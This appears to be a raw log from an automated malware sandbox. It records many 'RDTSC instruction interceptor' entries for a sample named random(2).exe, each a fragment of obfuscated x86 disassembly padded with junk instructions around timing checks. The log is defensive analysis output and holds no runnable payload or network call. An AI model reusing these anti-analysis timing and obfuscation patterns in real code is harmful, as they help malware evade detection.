                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8C89BB second address: 8C8A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007F83146B40C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F83146B40CDh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a jmp 00007F83146B40D7h 0x0000001f pushad 0x00000020 jmp 00007F83146B40D3h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B08AF second address: 51B08B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B08B3 second address: 51B08C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B08C2 second address: 51B08C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B08C8 second address: 51B08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B08CC second address: 51B0959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8314EA918Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov si, 86DDh 0x00000016 pushfd 0x00000017 jmp 00007F8314EA918Ah 0x0000001c sbb eax, 4C824138h 0x00000022 jmp 00007F8314EA918Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c movzx esi, di 0x0000002f pushfd 0x00000030 jmp 00007F8314EA9191h 0x00000035 or cx, 77D6h 0x0000003a jmp 00007F8314EA9191h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 jmp 00007F8314EA918Eh 0x00000047 push eax 0x00000048 jmp 00007F8314EA918Bh 0x0000004d xchg eax, ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0959 second address: 51B095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B095D second address: 51B0978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0978 second address: 51B0A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c jmp 00007F83146B40CAh 0x00000011 mov dword ptr [esp], esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F83146B40CEh 0x0000001b and eax, 2777D1E8h 0x00000021 jmp 00007F83146B40CBh 0x00000026 popfd 0x00000027 call 00007F83146B40D8h 0x0000002c mov ax, D2E1h 0x00000030 pop esi 0x00000031 popad 0x00000032 lea eax, dword ptr [ebp-04h] 0x00000035 jmp 00007F83146B40CDh 0x0000003a nop 0x0000003b pushad 0x0000003c pushad 0x0000003d mov si, 5E89h 0x00000041 pushfd 0x00000042 jmp 00007F83146B40D6h 0x00000047 sbb esi, 670409D8h 0x0000004d jmp 00007F83146B40CBh 0x00000052 popfd 0x00000053 popad 0x00000054 push eax 0x00000055 call 00007F83146B40CFh 0x0000005a pop ecx 0x0000005b pop ebx 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0A29 second address: 51B0A59 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8314EA918Eh 0x00000008 sbb eax, 70563B68h 0x0000000e jmp 00007F8314EA918Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx eax, dx 0x00000019 popad 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0A59 second address: 51B0A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0A75 second address: 51B0A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8314EA9195h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0A9E second address: 51B0AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83146B40CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0AF8 second address: 51B0AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0AFE second address: 51B0B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b mov bx, 2760h 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 je 00007F83146B40FFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, si 0x0000001f jmp 00007F83146B40D8h 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0B5D second address: 51B0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0B63 second address: 51B0B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0B67 second address: 51B0B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0B6B second address: 51B0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F83146B40D7h 0x00000012 and esi, 1ADC01AEh 0x00000018 jmp 00007F83146B40D9h 0x0000001d popfd 0x0000001e mov ah, BEh 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0BB2 second address: 51A0010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 3Dh 0x00000005 pushfd 0x00000006 jmp 00007F8314EA9195h 0x0000000b sub ecx, 18B38096h 0x00000011 jmp 00007F8314EA9191h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a leave 0x0000001b pushad 0x0000001c mov dx, cx 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 retn 0004h 0x00000026 nop 0x00000027 sub esp, 04h 0x0000002a xor ebx, ebx 0x0000002c cmp eax, 00000000h 0x0000002f je 00007F8314EA9328h 0x00000035 mov dword ptr [esp], 0000000Dh 0x0000003c call 00007F8319A2E241h 0x00000041 mov edi, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F8314EA918Ah 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0010 second address: 51A0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0014 second address: 51A001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A001A second address: 51A003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 58E5236Dh 0x00000010 mov ch, 89h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A003D second address: 51A0041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0041 second address: 51A0052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0052 second address: 51A0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0058 second address: 51A00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F83146B40D4h 0x00000013 sbb si, 11C8h 0x00000018 jmp 00007F83146B40CBh 0x0000001d popfd 0x0000001e mov ax, 8B3Fh 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F83146B40D2h 0x0000002a sub esp, 2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A00BB second address: 51A00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A00BF second address: 51A00C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A00C5 second address: 51A00D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A00D4 second address: 51A017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push edx 0x00000011 mov cx, C20Bh 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F83146B40CEh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F83146B40D0h 0x00000023 xchg eax, edi 0x00000024 pushad 0x00000025 call 00007F83146B40CEh 0x0000002a movzx eax, dx 0x0000002d pop edx 0x0000002e pushfd 0x0000002f jmp 00007F83146B40CCh 0x00000034 and ah, FFFFFFA8h 0x00000037 jmp 00007F83146B40CBh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007F83146B40D9h 0x00000044 xchg eax, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F83146B40CDh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A01D2 second address: 51A01E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A01E1 second address: 51A024E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F83146B40CFh 0x00000009 add cx, B06Eh 0x0000000e jmp 00007F83146B40D9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F83146B40D0h 0x0000001a sbb cl, FFFFFFE8h 0x0000001d jmp 00007F83146B40CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 inc ebx 0x00000027 pushad 0x00000028 call 00007F83146B40D4h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A024E second address: 51A026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 test al, al 0x0000000a pushad 0x0000000b mov bh, 80h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 popad 0x00000012 je 00007F8314EA9393h 0x00000018 pushad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02C8 second address: 51A02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02CE second address: 51A02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA9197h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02FA second address: 51A0326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F83146B40CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0326 second address: 51A0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A039A second address: 51A0407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jg 00007F8384F721B2h 0x0000000c pushad 0x0000000d jmp 00007F83146B40D8h 0x00000012 pushfd 0x00000013 jmp 00007F83146B40D2h 0x00000018 sub al, 00000038h 0x0000001b jmp 00007F83146B40CBh 0x00000020 popfd 0x00000021 popad 0x00000022 js 00007F83146B4151h 0x00000028 jmp 00007F83146B40D6h 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0407 second address: 51A040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A040B second address: 51A040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A040F second address: 51A0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0415 second address: 51A041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A041B second address: 51A041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A041F second address: 51A0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0423 second address: 51A0461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F83857671F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 pushfd 0x00000015 jmp 00007F8314EA918Bh 0x0000001a adc cl, 0000000Eh 0x0000001d jmp 00007F8314EA9199h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0461 second address: 51A0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0467 second address: 51A046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A046B second address: 51A048F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007F83146B40CFh 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ax, A091h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A048F second address: 51A0543 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8314EA918Eh 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007F8314EA918Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F8314EA9198h 0x00000019 sbb cx, 3448h 0x0000001e jmp 00007F8314EA918Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8314EA9194h 0x0000002d sub cx, 76A8h 0x00000032 jmp 00007F8314EA918Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F8314EA9198h 0x0000003e jmp 00007F8314EA9195h 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F8314EA918Ch 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0543 second address: 51A058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e push eax 0x0000000f mov ecx, ebx 0x00000011 pop edi 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F83146B40CBh 0x0000001d and cx, 175Eh 0x00000022 jmp 00007F83146B40D9h 0x00000027 popfd 0x00000028 movzx eax, dx 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A058F second address: 51A05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A05A3 second address: 51A05B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40CAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A05B2 second address: 51A05ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8314EA9196h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F8314EA918Dh 0x00000018 mov di, si 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190ABD second address: 5190AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190AC3 second address: 5190AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190AC7 second address: 5190B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F83146B40D4h 0x00000010 sbb eax, 1DC782E8h 0x00000016 jmp 00007F83146B40CBh 0x0000001b popfd 0x0000001c pushad 0x0000001d push esi 0x0000001e pop edx 0x0000001f mov bh, ah 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 call 00007F83146B40D3h 0x0000002c mov ch, 34h 0x0000002e pop ebx 0x0000002f pushfd 0x00000030 jmp 00007F83146B40D2h 0x00000035 and si, 57A8h 0x0000003a jmp 00007F83146B40CBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F83146B40D5h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190B57 second address: 5190B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA918Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190B7C second address: 5190BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2CDB65B2h 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, ax 0x00000014 pushfd 0x00000015 jmp 00007F83146B40CAh 0x0000001a add eax, 2821BEC8h 0x00000020 jmp 00007F83146B40CBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190BAE second address: 5190BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA9194h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0A99 second address: 51A0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0A9F second address: 51A0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8314EA9199h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0AD1 second address: 51A0AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0AE4 second address: 51A0B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8314EA918Fh 0x00000009 xor eax, 3A7C3E3Eh 0x0000000f jmp 00007F8314EA9199h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F8314EA9190h 0x0000001b or si, 8338h 0x00000020 jmp 00007F8314EA918Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c push eax 0x0000002d movsx edi, si 0x00000030 pop ecx 0x00000031 pushfd 0x00000032 jmp 00007F8314EA918Dh 0x00000037 xor esi, 7B4D89D6h 0x0000003d jmp 00007F8314EA9191h 0x00000042 popfd 0x00000043 popad 0x00000044 cmp dword ptr [75AB459Ch], 05h 0x0000004b jmp 00007F8314EA918Eh 0x00000050 je 00007F8385757005h 0x00000056 jmp 00007F8314EA9190h 0x0000005b pop ebp 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f mov cx, D6C3h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C3F second address: 51A0C6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F83146B40D3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C6C second address: 51A0C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C70 second address: 51A0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C76 second address: 51A0CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F8314EA9197h 0x00000014 pop ecx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 push edx 0x0000001a mov ch, 70h 0x0000001c pop edi 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8314EA9196h 0x00000027 rdtsc
